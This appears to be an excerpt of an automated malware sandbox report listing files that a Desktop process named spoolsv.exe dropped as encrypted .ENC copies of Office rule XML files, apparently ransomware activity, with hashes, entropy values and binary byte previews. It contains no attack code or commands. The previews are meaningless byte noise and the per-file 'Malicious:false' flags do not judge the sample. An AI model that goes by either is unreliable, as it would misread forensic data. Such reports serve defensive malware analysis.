                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...&.!.s..p~1.y.6r...(.X./u..a.?)..V...V.S.t@......;.{?8..Pg.....3.."...!..UqifM.E.)..^e.S.............7.=.a5..........,......"?.^.H..z6...oA.........{....Q.H.).....A...(.K..V..EOs..._<?{......>..eBO...zQJ.5..<v...F....%.Co...l.HH.Wh......>c....g..4....:...ZQ....Z!6.poP.t....L.u...r.+.a..w.hC?x.....K..d..B.I..vq.$pcd^...S"\WA,....<^X......n?.KQ...~.[..W.z..g..D.........>......HG...bp......0...>....T...k...DQ.1..n.S.rk.................N-*.J.h..?.g.5..yPq.{....I._...A.>.i].'..T+../.@....O....G..-.....:....5KB>iT1...k.P.l....yl.....v'..v.G.Qk.R.2..I....,..&..7M11...+..1-....S..q....tVX..r].O........=E..;qk..o.....n..-y..{.....<3.i..N.$..x`$..Hp...$H..a....[e.:yF.='.g.%,.o..2.q.E.?./1.<....q'.N1..Z.j..m$.v....w..}.<I...Fr.L...@^Xk. ?aU.m.<,K"..........[....Y.?3V...:Y..)uL.!...w6E.......Q......M.m.......Z......r'.$......5..L.j.R..L.}..c.q.....U}P..D..=....8>.Fn....H......v6N..E."....Rq....w;....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702451v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.883722892080475
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+BrsUjj3nvGrJEiDjGQa6dyD0D/atJOjNlnM+hAYSREOxyMx:+ZsUf3nvCJE4GQa0C0DwJKNtBGREm
                                                                                                                                                                                                                                                      MD5:0B3520B868843E75E822C3858183B51E
                                                                                                                                                                                                                                                      SHA1:5089B8ACE0B869BDD95716D0BF77DB773699A34F
                                                                                                                                                                                                                                                      SHA-256:0B5271F5A5421FC06FCAC5C571666D63D0FDAFAE9EEC1BEEF41094C5020A2351
                                                                                                                                                                                                                                                      SHA-512:2EE63F955B80B102024D87586D75DE6E912C3D4F50E6FBFAF79CA79DA4F57FDC004A2A718514E3BB05BBD4B14837F84732EF9D20CC6C39FAD8C963679632CE37
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F..k........B(......N.bT!......C.F...V..E....G_Q..V..}.@s.c..j..rLlm..^..dG..)3...-.Z.o........f[.d.gY..v.h4CO....`...../t.S;;.c....E.....).Id.RWx...Q..X....h..# ....T[.7._...&.j../a..Y.@..r......E.8e..'[z..sb6..A.......h.......i..y.x?..Wo.p.'c.......7Hcw.|0.g.n5[.3t,.o..(Z..?....I..%..Y.{@....'..{l....b.I..Fu...w..t~.N.[..:6..bJ.@..Y......8.P....s.\.j.u...=b.S.g....~^.$.Y.m.O...9...1..'8..b..l.4L..(...4.t.n.Qwi.'E.*J...O...e....F.,...tW..&....h...`..|.g.......(.*?.;.o5..[.O.8..>.).F......?.ABY..6/.......@}.C..?.hR.K._.3.Se...v.<YP....~lS.0..:j....J.@.t....m..,..n......m..O......?,.}biV....<.`....z....C2.f,.6a.o...Zn..6..S...J.i1..".w.N.Jz..7'~..B..?9.r.5Nj..u.U@.H.9..5...>..B|v.......oa.rE..q...D.....J...h.,..8.y....X?z^.;..V..Z..!..F....n.....+.....zB.. ..0@.<&0....^.Q.gO2.....Y....8.....v.S..z.vH.z....K..dI.J...9....U...r..Z..f.....Q^OKT.|.U.Mk.6..)#..T...4...r[....)..[1.+..F.9g.@.b.Z..H.&..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702500v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.8443659261784076
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+Y/x7v5Cggm5dnOxXXMROnnbyZ9VCdwryw5z3XiVhRIW460egoWfrWBK3b+LkOA2:+OODXgOb1Qy03cp41epWCBKL+4OA8NX
                                                                                                                                                                                                                                                      MD5:1A1DBCFBDDF2210F937F9C6686A5138F
                                                                                                                                                                                                                                                      SHA1:E7C4B285EF1BD11CA6EF337A932BC66D8517D016
                                                                                                                                                                                                                                                      SHA-256:5441494496F6B3D4512CD8EF4EAA9D4ED0728AF40E851EF67E257EFF879B3B5F
                                                                                                                                                                                                                                                      SHA-512:969B7CE783DD59345FFA2B7777975ED3BFE5CD4D36F4A84516707EB48C3CF6DA2E9A20BC9313BA8E2DE85FDC1D340C7491AE5C836D13808B68C4FAEE771E333D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....p..I=.~...@f...6........S;...%a...../k\>.....R......ta..29.OQ.....3.7........t..|r7.V.%yg......yE...%p....x..X;..).K...&5.L...t.t......a..S.qq).%.r...,......r.+.3.*s.......Oi#2.......c`..S6.g..Ue.D.z.y.2..+%.......m.@.m.wp.x..r^..`..g?n.}.1.}..W..|...m.5.....Fz......u.+a.,.L<..[..J.L.+..=*.`.Ec.....;!M..fY.<u...>..<1.+.G.@...6 UL.|5&......j.4......k........!(..=......+.Q...?I..0].L....h...A.&.D...X..M.....r./.y ...oJ../.t_(...?..CD....(P.l\...i%.......u..m.%[.A...&.t.. ?.(.A....\@s"~....-u6._..]..:w.ru.u...l.....U..|...^.{a.a..x.#....:..nya.....G6.=...07.:.WL.9..Bw.....<...._."=..;.."...=.......D...aw..ax.J..v.6og.ja......B@p/..kO.=..u10o..y..b.q!R.2e..P......aA.......I.".>.....u.B...x..n...0.].. .2.~.../Q.T-+}.,........L. .(c]..qN'.9.?#$k......S.T..+.........q...c..n.D..%.I.l..[.....(VG.Q.s&.,....g..x....L. C...1.a.....g..MI..e...Y..5`........`p.......7.. bO...p3......m.+.......ii6...W.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702501v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.8582753838668316
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+EUdASNq0J4TEdkeKz95Q2GZB3Prte/eDXyGF6toRWWAtFDQr9rtXc7PFH:+PdbNq0iKke8fbIB3DzDXy+6oWW4U5XQ
                                                                                                                                                                                                                                                      MD5:09A21E64B4561117DF5B24C11BF72617
                                                                                                                                                                                                                                                      SHA1:2657A075D277A4BE41997A1F4193F749468E950E
                                                                                                                                                                                                                                                      SHA-256:7D209069271B45E9FF02339B963CB470991256919668E2F21F2B035B5B3DA016
                                                                                                                                                                                                                                                      SHA-512:C652634F690FFF4E5B001729C40CE01234E32E464CE9D698429F04C47EA27E06E2D32EE655DED6735B70792072ACFA1532DAFD248C104CAD5725C32DC1F8FAE0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.YtaK..tY...*.+.s.i.}...#.0.c^.)(.B.r.Ai.........d....=.2......H..Y.E.......;....o.......'.;M.z.6z#>.HR..\l....{.%!.Wa...}WK..z..a....q.Pjm.I).7\.=.5X....m*.1.2.,.%.@MJ.5....2.....x...I..t..\Z.&...A.D..bQ.? ..I.....#.......~.8.q_....h..u.d..{..R[W..P....`v&|....QM#.`.Er~. ../s..1..e/......~^g..:......'....#G.>S.#e...P.S)N/..>.{.o.....)xGuGZ[7....X(.U..(...(..%..Sn.'....n&.E...@...S.....~LY..u7.....<......p.1.(.U/.qV.h...l..1.....#.qh.m.h....cb....D.}.....<...iZp.m?...L..(....z.H...C..^...gn.T...qh8..%..+:..].?....n....}.].Z*&...\.Aa.3O.Y.pv~?]....x.>.S.XRj;&..Q.r..j1..-t@..I-...\>/.C...Y.@^./....q|..p..=..~..0?...,.#...\....d..<....Jg.\.!@........v..AE.-].Ku.X#..#....]..{mNd..T.8.....S.E8.Y....r.5.Y#..E..,.0#..(.2.z..xM.%j......YTQ....L.....`[.........r.Z..Q:Y..;.....}.z.|L...d.s....=.1:......(. 9U.=.U...`8..;>.m...I...[.N..Q.....Bnd$+....L..\.1?)...w.>.EC%.@Gq#t?../B!..|G.......`.... ..eI.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702550v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.862644249044714
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+174jzc4UKWlRgx7EeP+OkzK9To6ZAUsRMInqmk16n3uZZLqHs4nZdwGtQ24pv7y:+5bRgGCxkzK9l2DMInqmqIePqM4n8EQA
                                                                                                                                                                                                                                                      MD5:5FB08539BA2385F212CFA2C37EB7D68F
                                                                                                                                                                                                                                                      SHA1:A68201B4F656D0A1302D9D12A88181AC9125880C
                                                                                                                                                                                                                                                      SHA-256:0DA4AE6B06293108611F47CEE4D5153284F56C494681EAE20CA7485D95CACC23
                                                                                                                                                                                                                                                      SHA-512:B9C93FBA98D947D62C4E051F76DD1D6F90AE4CD98E565EF3A4874ECC8E074E107096B5F88680BEC362E5A8C65CCAF1D6B571E1E6503CEB6847AC877E256E4F7B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F../........j....[[.%...t.+..}..Pc.m..w5.ph..!.-..i._y.*<...,)+C....;...}.../.0....4*z..c.Q...T..A.v.~$5l4.).v.Ge..b.Q^N.sV......[..@+....O..[0v.......`...l.....[...L.}..(...@..J.ocn.V.....r..B.Y.^.......<5.(.Ltm.jx8o...r..v.c.jJlfi.$.....a..i.O2.w.....M..LU{.p<\..}.2uv0.;...>.Z.,.w.z..o..Sh>.S1}/..b.x..i8"R-......,S.][..4......11....6O&'.i...5.\..Lu.I.e...?........c.aX\k......d.........=.@ ..A>..&.^.R)......a...*..m.S.1~.3.B..W.:P.K%..hoTDe./........j.F..-D..6.Q.3..[._....f.-iI.B".....V._p`t..%.H%........9 ......8d-....9.j..].._.Q.!t#.vP......n..r9.r.H.M>.L.....@....6.2.[..%...E......6B..g......n..U+g_....g.....4.....p.....<.2....B....x...R.VA.{.H.&..r..jv].......O...Zd.....r...........{~.!T.]..S...y9..q<..Z.K-.'....%...Q*!u..H.B.....J<Y..FY.....Z...|&.Yd..e_./.k.{!-.=....;...x..V;ni9f..M....)aL.q.....a....$.q...zBk<S....:.wvio.q....4.(..2Pe...I....Gw.......[.ju...H...T..)...."~...H4..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702551v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.857616539717999
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+sjC8WoGDRZj98us0ODhgJt+/odfCWGhT9/mpk/bvWG2UnkrGIPlQhNPimZrOkYZ:+sfuZjHs0ohyGoU9D7WOkrj2CjhYQ
                                                                                                                                                                                                                                                      MD5:B6B919EAF63EF74CA98117D9286649B1
                                                                                                                                                                                                                                                      SHA1:D116F4A6FFA73962D5D6FD0F43B2BBEF59A9B3FE
                                                                                                                                                                                                                                                      SHA-256:21FA8C4EC4CAA4263CBBFC2FE87991B32E9EAC46D9E4C1290BA7EC4975D0BF88
                                                                                                                                                                                                                                                      SHA-512:780566696694194E32DD6AEB2DFD9174281C52FE4E118C7CA2DCA33F0B3F920A49950645AD95AD50D43AA0A0F37D7C5534219A42A08ACFA9B021231B1345E3F1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.L...f......h........u.[..d....7...-..?.....]10...h.._.;....=Z....i.k).d...9.R-.s.*|U....x...N..a3J...u.Z.-}a. >..L...QX..Q."E{Vs.. ..s{...E..z...tU..e.....^...5....}...X..k....I..TD.!}u^...;..O...|.w.^....u...<..\.G..`C/ ...z...7eO....e.$..".>=.}JB..(.#....!A.m.....h]U.(...&6i..A..KY..o5U...~.W.@-.t.P..[...|..OY).3.3..=...q..1.QU......6.NZ9../.!n...[...R.....\CAj..^....f8.u.._W._...."..O.....+3%..f.!.I|.Q3.......*t/.75'....K..'..h.TB.q).[o?[_.*...N.}@.2...R..9p.....{.....a.b..{}....z....G(0...3!\5.6...b.,......W<.F.....[....O.. ...q.....h..E.-ME4.iJ........o.....c.H....>...M.% . 6..WK0...(.c".Q..L...v.Ie$)"!w......<.."..`..........|fa.y..j3f..<Lq/1a\.<6.b...{.3.%<x.+.fJ...J..5X-K......ue.6.....=2..t......;Nb7Ky.b0z.{..9...L.k.....3..&?V....?hw..w.7.\7&.Y.y...$....c.=.......<j....A...P.`0.V!...CG..X...j....a...C@.$&/..t7.o.Uk...n.E.;.#..,...:1.U..8m..V...Wa=..+..._h.,....J.!.B...6fM.t`.m..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702600v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.848966045191405
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+LzzBSq7jgvWZqScCnvF1oQpgecRiokT9vfvwpeLMlxSmlBuOw5UD:+3NSqQvWZwCnN1owge6WNXTMemvuOw6
                                                                                                                                                                                                                                                      MD5:0089D487433188361F2EDD03E0DAED0A
                                                                                                                                                                                                                                                      SHA1:AF0EC74AB9B95CF760B5D2B2BCD3869B7D9C4CAD
                                                                                                                                                                                                                                                      SHA-256:337819E1302CBA64BDEE5DBF04D61EBAE234C1B7C3EEDA57C3A3D9DC660161DA
                                                                                                                                                                                                                                                      SHA-512:9E565F567EE1281F17BFCC133C7E7781C5A14C4EB303F4729E8D4FB7CAD06E777B0F732897A4E508553B8A32DCF17FB100D36A1E4E904E2990B03C871F88316A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.i..VU]... ...... ..W1..hc..^.i..q.W........u....U...sL.^m:..]...P..+.E......Z..#3........]C.h[...T.L...Y.....a.pN.0+@.Q pm......?O..d_.,).4..$.G...0..L.ufY.do..O$.u.+..Q.)s|.j...E.X.b...\N.4.N./....X.]~<.D/$...sy...~.X@.?Y..Q"......\..:...8.V...39..^........PX.$b......+..h.VU..G.mv..].....W..Y0....#..6.-...Q.m.j.I.r....@H..qQ.v\7ms.lo......q8.n|...st.o+.*em...?.*..Z..O.......,.dP....{.q.}..cI.8c[.@~.`...(S.qV.&v~_......(..2.....)...p^.._..V..7..v.*......g.. .....[..,.%uK.:|..%.5Nv3.".......i.O.zp6J.mBk....*.A.H.. .Q..&H$f.1.N.}.D..b.~./C....*....1Tf....p"}HZ.q.0.n...c=..0r...".@.!;Y..2..(..}.Q......F.@[.._....W.(..p..\.....R(..m......-.A.....#.t_k#P.<.U.8.....b.p+......e.w.^.m.w.:JQ9.X5.mQ..%....F..'.*}&(....NO.?...9.g.\.S.G..Bnws..Z..9.....@.G]$.%..W...|nd..9..G...P....P..M..!..8..,.e.g../..m0.I.[...!.[...6A..Z....v..d..A1.D_8WJ..g..-..\..........$.6....:"E....!....A..dH......kx7.#_dC..x.A).

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702601v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.891646176961234
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+6fg73pY4AZ6M3Vsjt1O+Bv8zb9D/qTNDCNxs9p9H1hLgsxqAXANhb8xk+nMa4gD:+tlAZ6AVAwwvYBGTNDUiHjn7etb+Mah
                                                                                                                                                                                                                                                      MD5:12500F5C8E604B162A8590068000F865
                                                                                                                                                                                                                                                      SHA1:187F5A76AFE45E7C29072DC54A5CC0DF797AC361
                                                                                                                                                                                                                                                      SHA-256:BF20661971D60B27C65AB14966BF2FB68ADE506B997F8EAAA29D563FDE0C9833
                                                                                                                                                                                                                                                      SHA-512:148EBACD5CDAB4C619B19EC71F9CA7DF3158E863DAFEC3F2E1823A9B16BCB7A308EDB61DBAC92E74FA9A9218B62D0C0548699515F2211F46DF01DF231CF651AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....t.+....N.n.q`a.L..Iy..5..$.....Y.......I..g2..k..;.5i..s.m....0..w._[N..F!.!.w.^.6....d.K..Dd:....C.:.2.'u.M..O.|.-.eJB.{.i.D.....X..,eM..H.T....i....'...x.Q......4...`.H.+.)..X...N|:#a.J.X7 .m.......n.(..a..A.S<...)o.........CB..j..g.4.+k....<.B.;1.w...Ck...)p.L.U.K....\6.9..zd..4.*.(..V.....j..-.?hn5..-.....`.~i..i..QOIpP.F3.......c)..n...en...y.".<.q'.a().i.......x...z..#...\..}1..,.....O.MAX8HQ?..89t..g^...,c=..V..0.T..I.e,hdi.Z...F.v....m....f......886u9.3...O.d..>.a."..]..C|u.Y............P..q....B......Z.+.k....A...5%...?..".c.F...Y.p.qw."5...<.}6..m...k..A.M.}I..n.?......&.....U.re.....QWPfUl...aio....<.S..P.\..."7u.X.).(...=RM1..T..h..o.>~.....\;D.h...Gv.V%i.@.Xe......S...J......=t..a..be.'O7O.;\.r<..4....../.a..S..q....S....!....C.......]]1.w..kUG..<.. p./.R.`.7o.'~.O...k..70...P.."sn..W.p...8.uk.....^.<.#.8.O....=....!....nr.r..al.8..e...&.W.<}....2'.%Q.Y..[\}.<..#.5;k.o.s]..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702650v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.878143895582413
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+KbHdpPp/WdGdvSY0zxQta6NO7jOAEudyZ0WZFJ9Rh6qBN0hY7PKND:+4pcdGdaUO7jz+0WvJ9RMakY7PKND
                                                                                                                                                                                                                                                      MD5:CBDEDB40BD51D7363898D7155ED38AC6
                                                                                                                                                                                                                                                      SHA1:7CC327B1B4D416248AD7D87888BC88926578AC4D
                                                                                                                                                                                                                                                      SHA-256:F836592200F12C265BCEFB0265B58F25F61DBC6738F07A3133509F3CB3A6B192
                                                                                                                                                                                                                                                      SHA-512:386CCAB43E38CE64C9FBAE820101672B103787FF4AB94F3366016A834F073D66384F6978D8E70F7FCA6244973A993BDFA4E0F43F58E55B364AC0227B6893BD6A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.Sc...m...........SB.X.C.N.....:..$.X.^.M....Pg...~...%...A....I`..\!....K.....l.@.......D...Fs]+..pE...../s...)...>.'.p..^Ucd$..K..9I...o.K..?..:..I8E...*....x.k..k.......H+-..?.1..4PZ..3%i....)9.<:.s....Rx.. ...^...<6.`e*...#.Z.....X.._x.kw...T.3....8.m.*.Z..*.8....b...~.>tm{..me.4..R.,...Q..x.P..$|[n.zt...Gz....}..W;.n}.|=......b(..*3O......}...,...k...l.`M`o.....V.....F.2.G..g9eG..[...47....l..Z.....^..;.....PvH.I.Ek...)..O....G.q.]@`......T...rTs.Q....f...||.MZ.wJ.rc...b....6...zf.Z.d.}x........C.O......^...t,.}d.W...;@.......m;..+oG.........J.....y....q.K...a.A..n..fD zp...B...x9.e...a.C.8...T,.Q..".....X..0("i.i..A1............K4uq.............:x...UwR.Y.....|..{0.E~.w>y...8S...2..`l..gW...R......e.~.:.?.E$C..u...T.$`V...1..u.F.m.F>..3dz.]I.9T......Xg..Ra.R.....^.L....._l.Tn5......l.+.....f........'].^.6..a..!]...C.M...'m.i..z.........F+..5...ut.9..q...*ax9..9..I

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702651v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.841271225816122
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+F4YQvSstdgIaYGy3Tgarir357sK1a/OAxOyXjvOnK4cL5eeiWQB6kHCh:+wZtaYGy3MarBgaWAQ6vOK4Mv26Hh
                                                                                                                                                                                                                                                      MD5:34D8423040A53FC9AF31E5AEB87F04FA
                                                                                                                                                                                                                                                      SHA1:ECE36A93AEAEE5B868A3359B02B6B761F86B8D22
                                                                                                                                                                                                                                                      SHA-256:D8223485888600E6A1C1784353E2B3921F46E25010C83296D51874B36788F49C
                                                                                                                                                                                                                                                      SHA-512:3E9E866B675D8904EECC07DE673DEF942E4764B6E9BC0FA02164EDEBED912397591282FBF62F675290EC87C9EF0CE60C8E330AFAA79812EAE7C363FFA3A2E5D9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...+P..{..hQz....k.@..1.....1.U...FH.."..-.b.1.3..zE...*..).S0R.....u...}..!...E..nNN..i^.|.u.e...8o..!...v~V/+....._-...'...u.....M....BOJ.r...5(.P"~.m...n...E..z.-.%.../...k|A....V.I....Q(..i?.g..Y..[....I..@..y./.S1..G.......-.D....6..s&...zRs...>...`...UV...nk_)'.C....97h.G..K......BYeC]........E;+4!.j.K....z|.o...-]4..v..t..,_...N..;=..VE.~E...2..yh......b.....p...-...?..O....k..8'..-},e.2...g..J...".....:...nT7.M.;..!.t...E..j..|........*.T......<....H..C...A.[.kV...}.[q.a0.1|-....I.8....I......7+...l.y1..yl.".|..!?=..@..zN.;..B..K.m.4.eg....i.J.....hO..yz.....<gV:.....h...O.}..2...3.?..Zv.g<7<...ei.m.3B..O..."Q.O...\..9RU.....J..=C9....b...-....Em..D........g.....)F...<...{(.$3..Qu...3=..g...gf=@m.W..R,).v..]5T.=..F$.[/...-%.-yL\.R..\..ep..`TY.;5!~...z..d.SYd..`.S.}.i.........V.....Y..J....X..u..D.....V....3..+M..;...k...{K . g.0.4..EF...)....]....Mr...k.Y2..=.pG.wDRv..../\.%.=-..b.A....-M

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702700v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.871554757234002
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+an5ktlp+5TZi0u/Fw+0JOuLcKTRWyqC9/jSCBtVSW2fBG95iD06x6x1heMN7:+rlp+Z40u/Fw+0guVdN/jxaBG95q06xG
                                                                                                                                                                                                                                                      MD5:250179DB07DECED4B0CCCD6448C4F81B
                                                                                                                                                                                                                                                      SHA1:2B58637D27C4FBC8328503A93656FBCE5C0695C1
                                                                                                                                                                                                                                                      SHA-256:02A1E2D4BF66E006F8F3DE6B00C922BB993B62498FFA472FD7D3BF11BBC68F8B
                                                                                                                                                                                                                                                      SHA-512:5B08A0E6206340D49251983A1C1592BC538D4A087CB5ADFA668A90709AE5EFBD3A6B3D93A0BEB56F3C0200B4429F3DBD2FB90388A1643AC65249938B84E91E80
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....Tz=/..\...%;....lh.o.c...K..l..v.6..&W..{+%..pH}.3.b$.|.eF..,....HY....!jQ.1.....D..k.....t.p.....GCdX.:qu.Z;'A5..^2S.u..B"._G.i..z..K...\..@...">Z<K....`..<Wa..w........G.n..RV.9.t.m7_.......d.i@.......\._\. }....^4`c. ...WH..Q/z;.......HR..a.....s..v.Zi....(.-..)....S...gMZQ.|...~...5s3v...gF.O....l?.:.p..s...k>JI..U..!.:..^Xi.,.......:H{...p.....Ir.|4!..S.;...&..!... ..N....,ca.x*..k...@+h/..b".\b....2&..g.i...k.....k.RQ......._.N~.da9'.!.>..8.0..6...5hi...N..<.'P...o\....L~...-..-4.....P......i.............p.........t..L...(.P.....<i.m..=.g.1<. ./.M-....&.. ...x.U...8...UT..X..,..../...^R..H..+.*.....M;..TG...>_l......G....E....S........+z..$.^.v:1(p0..'../.pk...."....W...l..~..m.V.(74.....)....'...w.Kj.Ex[.......b.5.d..W.).q.q.=.eG.=..|....We.m/w...4I...u..&....I%..%Z..h<.;Hq.....h...hl.bg7.:..b.b.i..)z.S.hBp...)...P.......x.....9*..Q6<..Z.T%.>.p_J.R@......fB...).^..8..U |..V.<..R...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702701v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.859912087131695
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+tvG4ERrDYa+Lpri6Z1GAoN9ijqQQL8y7tjx3PCyCcUfKCn:+BGvRgppri6ZIijqtLl7DZCL
                                                                                                                                                                                                                                                      MD5:150E87967883F7AF11BD5E1D8DCF48F4
                                                                                                                                                                                                                                                      SHA1:B087D65B7CA2B59A8CCCD2C5FD2FF1D6DB53984B
                                                                                                                                                                                                                                                      SHA-256:1CBCB9646560CCA3D217DF7449E9730FBC3853EDDCB38DFE144C0FCCDD7D7A42
                                                                                                                                                                                                                                                      SHA-512:96B47B4B89EA028C6555B8852A52CD83897AC831F973B477AD9D2B6F36B8AE83DEE2DBC7F0EA7BD3B9724944FAE161BC6A3189214F9E3957602C5DFDD19D7BF3
                                                                                                                                                                                                                                                      Malicious:false
